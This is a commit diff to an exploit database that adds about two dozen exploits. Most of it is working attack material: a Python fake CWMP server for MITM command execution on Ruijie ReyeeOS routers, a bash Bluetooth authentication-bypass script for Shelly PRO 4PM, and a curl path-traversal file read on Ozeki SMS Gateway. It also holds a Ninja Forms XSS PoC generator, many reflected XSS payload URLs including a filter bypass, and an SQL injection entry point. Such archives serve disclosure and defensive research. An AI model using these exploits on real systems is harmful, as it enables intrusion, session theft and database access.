DB: 2023-08-05

25 changes to exploits/shellcodes/ghdb ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE) Shelly PRO 4PM v0.11.0 - Authentication Bypass Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated) Academy LMS 6.0 - Reflected XSS Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload JLex GuestBook 1.6.4 - Reflected XSS Joomla JLex Review 6.0.1 - Reflected XSS News Portal v4.0 - SQL Injection (Unauthorized) PHPJabbers Cleaning Business 1.0 - Reflected XSS PHPJabbers Night Club Booking 1.0 - Reflected XSS PHPJabbers Rental Property Booking 2.0 - Reflected XSS PHPJabbers Service Booking Script 1.0 - Reflected XSS PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS PHPJabbers Taxi Booking 2.0 - Reflected XSS Webedition CMS v2.9.8.8 - Remote Code Execution (RCE) Webedition CMS v2.9.8.8 - Stored XSS Webutler v3.2 - Remote Code Execution (RCE) WordPress adivaha Travel Plugin 2.3 - Reflected XSS WordPress adivaha Travel Plugin 2.3 - SQL Injection Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)
2023-08-05 00:16:32 +00:00 · 2023-08-05 00:16:32 +00:00 · 010e679abe
commit 010e679abe
parent 9229ea6f66
25 changed files with 1258 additions and 1 deletions
--- a/exploits/hardware/remote/51642.py
+++ b/exploits/hardware/remote/51642.py
@ -0,0 +1,176 @@
 # Exploit Title: ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE)
 # Google Dork: None
 # Date: July 31, 2023
 # Exploit Author: Riyan Firmansyah of Seclab
 # Vendor Homepage: https://ruijienetworks.com
 # Software Link: https://www.ruijienetworks.com/support/documents/slide_EW1200G-PRO-Firmware-B11P204
 # Version: ReyeeOS 1.204.1614; EW_3.0(1)B11P204, Release(10161400)
 # Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
 # CVE : None
 """
 Summary
 =======
 The Ruijie Reyee Cloud Web Controller allows the user to use a diagnostic tool which includes a ping check to ensure connection to the intended network, but the ip address input form is not validated properly and allows the user to perform OS command injection.
 In other side, Ruijie Reyee Cloud based Device will make polling request to Ruijie Reyee CWMP server to ask if there's any command from web controller need to be executed. After analyze the network capture that come from the device, the connection for pooling request to Ruijie Reyee CWMP server is unencrypted HTTP request.
 Because of unencrypted HTTP request that come from Ruijie Reyee Cloud based Device, attacker could make fake server using Man-in-The-Middle (MiTM) attack and send arbitrary commands to execute on the cloud based device that make CWMP request to fake server.
 Once the attacker have gained access, they can execute arbitrary commands on the system or application, potentially compromising sensitive data, installing malware, or taking control of the system.
 """
 #!/usr/bin/env python3
 # -*- coding: utf-8 -*-
 from html import escape, unescape
 import http.server
 import socketserver
 import io
 import time
 import re
 import argparse
 import gzip
 # command payload
 command = "uname -a"
 # change this to serve on a different port
 PORT = 8080
 def cwmp_inform(soap):
    cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1)
    product_class = re.search(r"(?:<ProductClass.*?>)(.*?)(?:<\/ProductClass>)", soap).group(1)
    serial_number = re.search(r"(?:<SerialNumber.*?>)(.*?)(?:<\/SerialNumber>)", soap).group(1)
    result = {'cwmp_id': cwmp_id, 'product_class': product_class, 'serial_number': serial_number, 'parameters': {}}
    parameters = re.findall(r"(?:<P>)(.*?)(?:<\/P>)", soap)
    for parameter in parameters:
        parameter_name = re.search(r"(?:<N>)(.*?)(?:<\/N>)", parameter).group(1)
        parameter_value = re.search(r"(?:<V>)(.*?)(?:<\/V>)", parameter).group(1)
        result['parameters'][parameter_name] = parameter_value
    return result
 def cwmp_inform_response():
    return """<?xml version='1.0' encoding='UTF-8'?>
 <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">16</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:InformResponse><MaxEnvelopes>1</MaxEnvelopes></cwmp:InformResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>"""
 def command_payload(command):
    current_time = time.time()
    result = """<?xml version='1.0' encoding='UTF-8'?>
 <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">ID:intrnl.unset.id.X_RUIJIE_COM_CN_ExecuteCliCommand{cur_time}</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand><Mode>config</Mode><CommandList SOAP-ENC:arrayType="xsd:string[1]"><Command>{command}</Command></CommandList></cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand></SOAP-ENV:Body></SOAP-ENV:Envelope>""".format(cur_time=current_time, command=command)
    return result
 def command_response(soap):
    cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1)
    command = re.search(r"(?:<Command>)(.*?)(?:<\/Command>)", soap).group(1)
    response = re.search(r"(?:<Response>)((\n|.)*?)(?:<\/Response>)", soap).group(1)
    result = {'cwmp_id': cwmp_id, 'command': command, 'response': response}
    return result
 class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
    protocol_version = 'HTTP/1.1'
    def do_GET(self):
        self.send_response(204)
        self.end_headers()
    def do_POST(self):
        print("[*] Got hit by", self.client_address)
        f = io.BytesIO()
        if 'service' in self.path:
            stage, info = self.parse_stage()
            if stage == "cwmp_inform":
                self.send_response(200)
                print("[!] Got Device information", self.client_address)
                print("[*] Product Class:", info['product_class'])
                print("[*] Serial Number:", info['serial_number'])
                print("[*] MAC Address:", info['parameters']['mac'])
                print("[*] STUN Client IP:", info['parameters']['stunclientip'])
                payload = bytes(cwmp_inform_response(), 'utf-8')
                f.write(payload)
                self.send_header("Content-Length", str(f.tell()))
            elif stage == "command_request":
                self.send_response(200)
                self.send_header("Set-Cookie", "JSESSIONID=6563DF85A6C6828915385C5CDCF4B5F5; Path=/service; HttpOnly")
                print("[*] Device interacting", self.client_address)
                print(info)
                payload = bytes(command_payload(escape("ping -c 4 127.0.0.1 && {}".format(command))), 'utf-8')
                f.write(payload)
                self.send_header("Content-Length", str(f.tell()))
            else:
                print("[*] Command response", self.client_address)
                print(unescape(info['response']))
                self.send_response(204)
                f.write(b"")
        else:
            print("[x] Received invalid request", self.client_address)
            self.send_response(204)
            f.write(b"")
        f.seek(0)
        self.send_header("Connection", "keep-alive")
        self.send_header("Content-type", "text/xml;charset=utf-8")
        self.end_headers()
        if f:
            self.copyfile(f, self.wfile)
            f.close()
    def parse_stage(self):
        content_length = int(self.headers['Content-Length'])
        post_data = gzip.decompress(self.rfile.read(content_length))
        if "cwmp:Inform" in post_data.decode("utf-8"):
            return ("cwmp_inform", cwmp_inform(post_data.decode("utf-8")))
        elif "cwmp:X_RUIJIE_COM_CN_ExecuteCliCommandResponse" in post_data.decode("utf-8"):
            return ("command_response", command_response(post_data.decode("utf-8")))
        else:
            return ("command_request", "Ping!")
    def log_message(self, format, *args):
        return
 if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--bind', '-b', default='', metavar='ADDRESS',
                        help='Specify alternate bind address '
                             '[default: all interfaces]')
    parser.add_argument('port', action='store',
                        default=PORT, type=int,
                        nargs='?',
                        help='Specify alternate port [default: {}]'.format(PORT))
    args = parser.parse_args()
    Handler = CustomHTTPRequestHandler
    with socketserver.TCPServer((args.bind, args.port), Handler) as httpd:
        ip_addr = args.bind if args.bind != '' else '0.0.0.0'
        print("[!] serving fake CWMP server at {}:{}".format(ip_addr, args.port))
        try:
            httpd.serve_forever()
        except KeyboardInterrupt:
            pass
        httpd.server_close()
 """
 Output
 ======
 ubuntu:~$ python3 exploit.py
 [!] serving fake CWMP server at 0.0.0.0:8080
 [*] Got hit by ('[redacted]', [redacted])
 [!] Got Device information ('[redacted]', [redacted])
 [*] Product Class: EW1200G-PRO
 [*] Serial Number: [redacted]
 [*] MAC Address: [redacted]
 [*] STUN Client IP: [redacted]:[redacted]
 [*] Got hit by ('[redacted]', [redacted])
 [*] Device interacting ('[redacted]', [redacted])
 Ping!
 [*] Got hit by ('[redacted]', [redacted])
 [*] Command response ('[redacted]', [redacted])
 PING 127.0.0.1 (127.0.0.1): 56 data bytes
 64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.400 ms
 64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.320 ms
 64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.320 ms
 64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.300 ms
 --- 127.0.0.1 ping statistics ---
 4 packets transmitted, 4 packets received, 0% packet loss
 round-trip min/avg/max = 0.300/0.335/0.400 ms
 Linux Ruijie 3.10.108 #1 SMP Fri Apr 14 00:39:29 UTC 2023 mips GNU/Linux
 """
--- a/exploits/hardware/remote/51657.txt
+++ b/exploits/hardware/remote/51657.txt
@ -0,0 +1,68 @@
 #!/bin/bash
 # Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass
 # Google Dork: NA
 # Date: 2nd August 2023
 # Exploit Author: The Security Team [exploitsecurity.io]
 # Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability
 # Vendor Homepage: https://www.shelly.com/
 # Software Link: NA
 # Version: Firmware v0.11.0 (REQUIRED)
 # Tested on: MacOS/Linux
 # CVE : CVE-2023-33383
 IFS=
 failed=$false
 RED="\e[31m"
 GREEN="\e[92m"
 WHITE="\e[97m"
 ENDCOLOR="\e[0m"
 substring="Connection refused"
 banner()
    {
        clear
        echo -e "${GREEN}[+]*********************************************************[+]"
        echo -e "${GREEN}|   Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}]              |"
        echo -e "${GREEN}|   Description: Shelly PRO 4PM - Out of Bounds              |"
        echo -e "${GREEN}|   CVE: CVE-2023-33383                                      |"
        echo -e "${GREEN}[+]*********************************************************[+]"
        echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"
    }
 banner
 read -s -n 1 key
 if [ "$key" = "x" ]; then
    exit 0;
 elif [ "$key" = "" ]; then
    gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)
    if [ -z "$gattout" ]; then
        echo -e "${RED}Connection timed out${ENDCOLOR}"
        exit 0;
    else
    sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1
    echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"
    sleep 1
    if [ $? -eq 1 ]; then
       $failed=$true
       exit 0;
    fi
    sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1
    sleep 1
    if [ $? -eq 1 ]; then
        $failed=$true
        echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
        exit 0;
    else
       sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1
       sleep 1
       for i in {1..5}
       do
          echo -ne "${GREEN}."
          sleep 1
       done
       echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"
    fi
 fi
 fi
--- a/exploits/multiple/webapps/51646.txt
+++ b/exploits/multiple/webapps/51646.txt
@ -0,0 +1,19 @@
 # Exploit Title: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)
 # Date: 01.08.2023
 # Exploit Author: Ahmet Ümit BAYRAM
 # Vendor Homepage: https://ozeki-sms-gateway.com
 # Software Link:
 https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip
 # Version: 10.3.208
 # Tested on: Windows 10
 ##################################### Arbitrary File Read PoC
 #####################################
 curl
 https://localhost:9515/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
 ##################################### Arbitrary File Read PoC
 #####################################
--- a/exploits/php/webapps/51643.txt
+++ b/exploits/php/webapps/51643.txt
@ -0,0 +1,24 @@
 # Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting
 # Date: 2023.Aug.01
 # Exploit Author: Pedro (ISSDU TW)
 # Vendor Homepage: https://loganalyzer.adiscon.com/
 # Software Link: https://loganalyzer.adiscon.com/download/
 # Version: v4.1.13 and before
 # Tested on: Linux
 # CVE : CVE-2023-36306
 There are several installation method.
 If you installed without database(File-Based),No need to login.
 If you installed with database, You should login with Read Only User(at least)
 XSS Payloads are as below:
 XSS
 http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
 http://[ip address]/loganalyzer/chartgenerator.php?type=2&byfield=syslogseverity&width=400&%%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E=123
 http://[ip address]/loganalyzer/details.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
 http://[ip address]/loganalyzer/index.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
 http://[ip address]/loganalyzer/search.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
 http://[ip address]/loganalyzer/export.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
 http://[ip address]/loganalyzer/reports.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
 http://[ip address]/loganalyzer/statistics.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
--- a/exploits/php/webapps/51644.py
+++ b/exploits/php/webapps/51644.py
@ -0,0 +1,158 @@
 # Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated)
 # Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt
 # Date: 2023-07-27
 # Exploit Author: Mehran Seifalinia
 # Vendor Homepage: https://ninjaforms.com/
 # Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip
 # Version: 3.6.25
 # Tested on: Windows 10
 # CVE: CVE-2023-37979
 from requests import get
 from sys import argv
 from os import getcwd
 import webbrowser
 from time import sleep
 # Values:
 url = argv[-1]
 if url[-1] == "/":
    url = url.rstrip("/")
 # Constants
 CVE_NAME = "CVE-2023-37979"
 VULNERABLE_VERSION = "3.6.25"
  # HTML template
 HTML_TEMPLATE = f"""<!DOCTYPE html>
 <!-- Created By Mehran Seifalinia -->
 <html>
 <head>
  <title>{CVE_NAME}</title>
  <style>
    body {{
      font-family: Arial, sans-serif;
      background-color: #f7f7f7;
      color: #333;
      margin: 0;
      padding: 0;
    }}
    header {{
      background-color: #4CAF50;
      padding: 10px;
      text-align: center;
      color: white;
      font-size: 24px;
    }}
    .cool-button {{
      background-color: #007bff;
      color: white;
      padding: 10px 20px;
      border: none;
      cursor: pointer;
      font-size: 16px;
      border-radius: 4px;
    }}
    .cool-button:hover {{
      background-color: #0056b3;
    }}
  </style>
 </head>
 <body>
  <header>
 	Ninja-forms reflected XSS ({CVE_NAME})</br>
    Created by Mehran Seifalinia
  </header>
  <div style="padding: 20px;">
    <form action="{url}/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="nf&#95;batch&#95;process" />
      <input type="hidden" name="batch&#95;type" value="import&#95;form&#95;template" />
      <input type="hidden" name="security" value="e29f2d8dca" />
      <input type="hidden" name="extraData&#91;template&#93;" value="formtemplate&#45;contactformd" />
      <input type="hidden" name="method&#95;override" value="&#95;respond" />
      <input type="hidden" name="data" value="Mehran"&#125;&#125;<img&#32;src&#61;Seifalinia&#32;onerror&#61;alert&#40;String&#46;fromCharCode&#40;78&#44;105&#44;110&#44;106&#44;97&#44;45&#44;102&#44;111&#44;114&#44;109&#44;115&#44;32&#44;114&#44;101&#44;102&#44;108&#44;101&#44;99&#44;116&#44;101&#44;100&#44;32&#44;88&#44;83&#44;83&#44;10&#44;67&#44;86&#44;69&#44;45&#44;50&#44;48&#44;50&#44;51&#44;45&#44;51&#44;55&#44;57&#44;55&#44;57&#44;10&#44;45&#44;77&#44;101&#44;104&#44;114&#44;97&#44;110&#44;32&#44;83&#44;101&#44;105&#44;102&#44;97&#44;108&#44;105&#44;110&#44;105&#44;97&#44;45&#41;&#41;>" />
      <input type="submit" class="cool-button" value="Click here to Execute XSS" />
    </form>
  </div>
  <div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div>
  <footer>
 	<a href="https://github.com/Mehran-Seifalinia">Github</a>
 	</br>
 	<a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a
  </footer>
 </body>
 </html>
 """
 def exploit():
    with open(f"{CVE_NAME}.html", "w") as poc:
        poc.write(HTML_TEMPLATE)
        print(f"[@] POC Generated at {getcwd()}\{CVE_NAME}.html")
        print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
        sleep(2)
        webbrowser.open(f"{getcwd()}\{CVE_NAME}.html")
 # Check if the vulnerable version is installed
 def check_CVE():
    try:
        response = get(url + "/wp-content/plugins/ninja-forms/readme.txt")
        if response.status_code != 200 or not("Ninja Forms" in response.text):
            print("[!] Ninja-forms plugin has not installed on this site.")
            return False
        else:
            version = response.text.split("Stable tag:")[1].split("License")[0].split()[0]
            main_version = int(version.split(".")[0])
            partial_version = int(version.split(".")[1])
            final_version = int(version.split(".")[2])
            if (main_version < 3) or (main_version == 3 and partial_version < 6) or (main_version == 3 and partial_version == 6 and final_version <= 25):
                print(f"[*] Vulnerable Nonja-forms version {version} detected!")
                return True
            else:
                print(f"[!] Nonja-forms version {version} is not vulnerable!")
                return False
    except Exception as error:
        print(f"[!] Error: {error}")
        exit()
 # Check syntax of the script
 def check_script():
    usage = f"""
 Usage: {argv[0].split("/")[-1].split("/")[-1]} [OPTIONS] [TARGET]
    OPTIONS:
        --exploit:  Open a browser and execute the vulnerability.
    TARGET:
        An URL starts with 'http://' or 'https://'
 Examples:
    > {argv[0].split("/")[-1]} https://vulnsite.com
    > {argv[0].split("/")[-1]} --exploit https://vulnsite.com
 """
    try:
        if len(argv) < 2 or len(argv) > 3:
            print("[!] Syntax error...")
            print(usage)
            exit()
        elif not url.startswith(tuple(["http://", "https://"])):
            print("[!] Invalid target...\n\tTarget most starts with 'http://' or 'https://'")
            exit()
        else:
            for arg in argv:
                if arg == argv[0]:
                    print("[*]Starting the script >>>")
                    state = check_CVE()
                    if state == False:
                        exit()
                elif arg.lower() == "--exploit":
                    exploit()
                elif arg == url:
                    continue
                else:
                    print(f"[!] What the heck is '{arg}' in the command?")
    except Exception as error:
        print(f"[!] Error: {error}")
        exit()
 if __name__ == "__main__":
    check_script()
--- a/exploits/php/webapps/51645.txt
+++ b/exploits/php/webapps/51645.txt
@ -0,0 +1,35 @@
 # Exploit Title: Joomla JLex Review 6.0.1 - Reflected XSS
 # Exploit Author: CraCkEr
 # Date: 01/08/2023
 # Vendor: JLexArt
 # Vendor Homepage: https://jlexart.com/
 # Software Link: https://extensions.joomla.org/extension/jlex-review/
 # Demo: https://jlexreview.jlexart.com/
 # Version: 6.0.1
 # Tested on: Windows 10 Pro
 # Impact: Manipulate the content of the site
 ## Greetings
 The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
 CryptoJob (Twitter) twitter.com/0x0CryptoJob
 ## Description
 The attacker can send to victim a link containing a malicious URL in an email or instant message
 can perform a wide variety of actions, such as stealing the victim's session token or login credentials
 Path: /
 URL parameter is vulnerable to XSS
 https://website/?review_id=5&itwed"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"b7yzn=1
 XSS Payloads:
 itwed"onmouseover="confirm(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"b7yzn
--- a/exploits/php/webapps/51647.txt
+++ b/exploits/php/webapps/51647.txt
@ -0,0 +1,34 @@
 # Exploit Title: JLex GuestBook 1.6.4 - Reflected XSS
 # Exploit Author: CraCkEr
 # Date: 01/08/2023
 # Vendor: JLexArt
 # Vendor Homepage: https://jlexart.com/
 # Software Link: https://extensions.joomla.org/extension/contacts-and-feedback/guest-book/jlex-guestbook/
 # Demo: https://jlexguestbook.jlexart.com/
 # Version: 1.6.4
 # Tested on: Windows 10 Pro
 # Impact: Manipulate the content of the site
 ## Greetings
 The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
 CryptoJob (Twitter) twitter.com/0x0CryptoJob
 ## Description
 The attacker can send to victim a link containing a malicious URL in an email or instant message
 can perform a wide variety of actions, such as stealing the victim's session token or login credentials
 Path: /u/perry-705
 GET parameter 'q' is vulnerable to XSS
 http://website/u/perry-705?q=[XSS]&wl=1
 XSS Payloads:
 db8ck"onfocus="confirm(1)"autofocus="xwu0k
--- a/exploits/php/webapps/51648.txt
+++ b/exploits/php/webapps/51648.txt
@ -0,0 +1,24 @@
 # Exploit Title: PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS
 # Exploit Author: CraCkEr
 # Date: 20/07/2023
 # Vendor: PHPJabbers
 # Vendor Homepage: https://www.phpjabbers.com/
 # Software Link: https://www.phpjabbers.com/shuttle-booking-software/
 # Version: 1.0
 # Tested on: Windows 10 Pro
 # Impact: Manipulate the content of the site
 # CVE: CVE-2023-4112
 ## Description
 The attacker can send to victim a link containing a malicious URL in an email or instant message
 can perform a wide variety of actions, such as stealing the victim's session token or login credentials
 Path: /index.php
 URL parameter is vulnerable to RXSS
 https://website/index.php/gm5rj"><script>alert(1)</script>bwude?controller=pjAdmin&action=pjActionLogin&err=1
--- a/exploits/php/webapps/51649.txt
+++ b/exploits/php/webapps/51649.txt
@ -0,0 +1,30 @@
 # Exploit Title: PHPJabbers Service Booking Script 1.0 - Reflected XSS
 # Exploit Author: CraCkEr
 # Date: 21/07/2023
 # Vendor: PHPJabbers
 # Vendor Homepage: https://www.phpjabbers.com/
 # Software Link: https://www.phpjabbers.com/service-booking-script/
 # Version: 1.0
 # Tested on: Windows 10 Pro
 # Impact: Manipulate the content of the site
 # CVE: CVE-2023-4113
 ## Greetings
 The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
 CryptoJob (Twitter) twitter.com/0x0CryptoJob
 ## Description
 The attacker can send to victim a link containing a malicious URL in an email or instant message
 can perform a wide variety of actions, such as stealing the victim's session token or login credentials
 Path: /index.php
 GET parameter 'index' is vulnerable to RXSS
 https://website/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=[XSS]
--- a/exploits/php/webapps/51650.txt
+++ b/exploits/php/webapps/51650.txt
@ -0,0 +1,30 @@
 # Exploit Title: PHPJabbers Night Club Booking 1.0 - Reflected XSS
 # Exploit Author: CraCkEr
 # Date: 21/07/2023
 # Vendor: PHPJabbers
 # Vendor Homepage: https://www.phpjabbers.com/
 # Software Link: https://www.phpjabbers.com/night-club-booking-software/
 # Version: 1.0
 # Tested on: Windows 10 Pro
 # Impact: Manipulate the content of the site
 # CVE: CVE-2023-4114
 ## Greetings
 The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
 CryptoJob (Twitter) twitter.com/0x0CryptoJob
 ## Description
 The attacker can send to victim a link containing a malicious URL in an email or instant message
 can perform a wide variety of actions, such as stealing the victim's session token or login credentials
 Path: /index.php
 GET parameter 'index' is vulnerable to RXSS
 https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=
--- a/exploits/php/webapps/51651.txt
+++ b/exploits/php/webapps/51651.txt
@ -0,0 +1,32 @@
 # Exploit Title: PHPJabbers Cleaning Business 1.0 - Reflected XSS
 # Exploit Author: CraCkEr
 # Date: 21/07/2023
 # Vendor: PHPJabbers
 # Vendor Homepage: https://www.phpjabbers.com/
 # Software Link: https://www.phpjabbers.com/cleaning-business-software/
 # Version: 1.0
 # Tested on: Windows 10 Pro
 # Impact: Manipulate the content of the site
 # CVE: CVE-2023-4115
 ## Greetings
 The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
 CryptoJob (Twitter) twitter.com/0x0CryptoJob
 ## Description
 The attacker can send to victim a link containing a malicious URL in an email or instant message
 can perform a wide variety of actions, such as stealing the victim's session token or login credentials
 Path: /index.php
 GET parameter 'index' is vulnerable to RXSS
 https://website/index.php?controller=pjFront&action=pjActionServices&locale=1&index=[XSS]
 [-] Done
--- a/exploits/php/webapps/51652.txt
+++ b/exploits/php/webapps/51652.txt
@ -0,0 +1,33 @@
 # Exploit Title: PHPJabbers Taxi Booking 2.0 - Reflected XSS
 # Exploit Author: CraCkEr
 # Date: 22/07/2023
 # Vendor: PHPJabbers
 # Vendor Homepage: https://www.phpjabbers.com/
 # Software Link: https://www.phpjabbers.com/taxi-booking-script/
 # Version: 2.0
 # Tested on: Windows 10 Pro
 # Impact: Manipulate the content of the site
 # CVE: CVE-2023-4116
 ## Greetings
 The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
 CryptoJob (Twitter) twitter.com/0x0CryptoJob
 ## Description
 The attacker can send to victim a link containing a malicious URL in an email or instant message
 can perform a wide variety of actions, such as stealing the victim's session token or login credentials
 Path: /index.php
 GET parameter 'index' is vulnerable to RXSS
 https://website/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=[XSS]
 [-] Done
--- a/exploits/php/webapps/51653.txt
+++ b/exploits/php/webapps/51653.txt
@ -0,0 +1,33 @@
 # Exploit Title: PHPJabbers Rental Property Booking 2.0 - Reflected XSS
 # Exploit Author: CraCkEr
 # Date: 22/07/2023
 # Vendor: PHPJabbers
 # Vendor Homepage: https://www.phpjabbers.com/
 # Software Link: https://www.phpjabbers.com/rental-property-booking-calendar/
 # Version: 2.0
 # Tested on: Windows 10 Pro
 # Impact: Manipulate the content of the site
 # CVE: CVE-2023-4117
 ## Greetings
 The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
 CryptoJob (Twitter) twitter.com/0x0CryptoJob
 ## Description
 The attacker can send to victim a link containing a malicious URL in an email or instant message
 can perform a wide variety of actions, such as stealing the victim's session token or login credentials
 Path: /index.php
 GET parameter 'index' is vulnerable to RXSS
 https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=
 [-] Done
--- a/exploits/php/webapps/51654.txt
+++ b/exploits/php/webapps/51654.txt
@ -0,0 +1,52 @@
 # Exploit Title: Academy LMS 6.0 - Reflected XSS
 # Exploit Author: CraCkEr
 # Date: 22/07/2023
 # Vendor: Creativeitem
 # Vendor Homepage: https://creativeitem.com/
 # Software Link: https://demo.creativeitem.com/academy/
 # Version: 6.0
 # Tested on: Windows 10 Pro
 # Impact: Manipulate the content of the site
 # CVE: CVE-2023-4119
 ## Greetings
 The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
 CryptoJob (Twitter) twitter.com/0x0CryptoJob
 ## Description
 The attacker can send to victim a link containing a malicious URL in an email or instant message
 can perform a wide variety of actions, such as stealing the victim's session token or login credentials
 Path: /academy/home/courses
 GET parameter 'query' is vulnerable to XSS
 https://website/academy/home/courses?query=[XSS]
 Path: /academy/home/courses
 GET parameter 'sort_by' is vulnerable to XSS
 https://website/academy/home/courses?category=web-design&price=all&level=all&language=all&rating=all&sort_by=[XSS]
 XSS Payloads (Blocked) :
 <script>alert(1)</script>
 ldt4d"><ScRiPt>alert(1)</ScRiPt>nuydd
 XSS Payload Bypass Filter :
 cplvz"><img src=a onerror=alert(1)>fk4ap
 [-] Done
--- a/exploits/php/webapps/51655.txt
+++ b/exploits/php/webapps/51655.txt
@ -0,0 +1,42 @@
 # Exploit Title: WordPress adivaha Travel Plugin 2.3 - SQL Injection
 # Exploit Author: CraCkEr
 # Date: 29/07/2023
 # Vendor: adivaha - Travel Tech Company
 # Vendor Homepage: https://www.adivaha.com/
 # Software Link: https://wordpress.org/plugins/adiaha-hotel/
 # Demo: https://www.adivaha.com/demo/adivaha-online/
 # Version: 2.3
 # Tested on: Windows 10 Pro
 # Impact: Database Access
 ## Greetings
 The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
 CryptoJob (Twitter) twitter.com/0x0CryptoJob
 ## Description
 SQL injection attacks can allow unauthorized access to sensitive data, modification of
 data and crash the application or make it unavailable, leading to lost revenue and
 damage to a company's reputation.
 Path: /mobile-app/v3/
 GET parameter 'pid' is vulnerable to SQL Injection
 https://website/mobile-app/v3/?pid=[SQLI]&isMobile=chatbot
 ---
